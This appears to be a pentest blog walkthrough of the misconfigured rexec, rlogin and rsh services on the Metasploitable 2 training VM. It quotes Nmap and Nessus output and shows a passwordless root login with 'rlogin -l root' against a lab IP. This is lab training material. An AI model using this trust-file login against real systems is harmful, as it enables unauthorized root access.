Channel: Pax Pentest » Exploit

Metasploitable 2: Remote Access Ports 512, 513 & 514


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
512/tcp   open  exec?
513/tcp   open  login
514/tcp   open  tcpwrapped

All three are the Berkeley “r” services: rexec on 512, rlogin on 513 and rsh on 514. Nmap could not fingerprint 512 (hence the “?”) and reports 514 as tcpwrapped, which is typically what you see when rshd closes a connection that did not come from a reserved source port below 1024, as an unprivileged service probe does. None of these services asks for a password in the normal sense: they trust whatever /etc/hosts.equiv and the target user’s ~/.rhosts say, and a wildcard entry in either file lets any host log in as that user. That is how Metasploitable 2 has been configured, and it is a textbook misconfiguration.

The Nessus report is even more revealing for port 514:

Port 514/tcp

rsh Unauthenticated Access (via finger Information)

Synopsis

It was possible to log on this machine without password.

Description

Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.

This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured.

Solution

If the remote host is a Cisco Prime LAN Management Solution virtual appliance, apply the relevant patch referenced in Cisco security advisory cisco-sa-20130109-lms.

Otherwise, remove the .rhosts files or set a password on the impacted accounts.

Risk Factor

Critical

Ports - tcp/514

It was possible to log into this host using the account ‘root’.
Here is the output of the ‘id’ command :
uid=0(root) gid=0(root) groups=0(root)

It was possible to log into this host using the account ‘bin’.
Here is the output of the ‘id’ command :
uid=2(bin) gid=2(bin) groups=2(bin)

It was possible to log into this host using the account ‘daemon’.
Here is the output of the ‘id’ command :
uid=1(daemon) gid=1(daemon) groups=1(daemon)

It was possible to log into this host using the account ‘nobody’.
Here is the output of the ‘id’ command :
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

It was possible to log into this host using the account ‘postgres’.
Here is the output of the ‘id’ command :
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

This port is wide open.

To exploit these misconfigured r-services the attacking machine needs the legacy clients (rsh, rlogin and rexec), which Debian-based distributions ship in the rsh-client package, installed from the Terminal with apt-get install rsh-client. One check is worth making first: openssh-client registers its own rsh and rlogin names that simply invoke ssh, so confirm that the rlogin you are about to run is the rsh-client one, otherwise you will be negotiating an SSH session and the ~/.rhosts trust never comes into play. Nessus tested port 514 (rsh); the same trust files govern rlogin on port 513, so either client gets you in, and the exploit could not be simpler:

:~# rlogin -l root 192.168.1.103
Last login: Tue Nov 12 16:59:44 EST 2013 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.
root@metasploitable:~#

Simple as that!
